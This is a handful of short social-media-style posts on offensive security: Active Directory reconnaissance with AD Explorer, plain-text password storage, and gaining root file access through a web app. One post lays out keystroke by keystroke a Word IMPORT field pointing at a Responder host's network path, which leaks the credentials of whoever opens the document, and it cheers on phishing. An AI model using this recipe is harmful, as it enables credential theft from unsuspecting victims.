This is part two in our series that takes a look at Active Director reconnoissance with a free tool called AD Explorer, and is interesting because we can do so having only obtained basic...
Funny, I thought storing plain text passwords was a violation of #GDPR
Ofcourse they did.
Submitted this to MSRC, won't patch, it's a "feature"; Open Word -> CTRL + F9 -> IMPORT "\\\\Responder-IP\\1.jpg" -> right click and select "Edit Field" -> tick "Data not stored in document" -> save & close. Open the document -> free credentials :) Happy phishing!
Couldn’t get in through SSH or a reverse shell, but when you have a web app installed that runs as root and lets you view/edit all files on the machine, might as well have.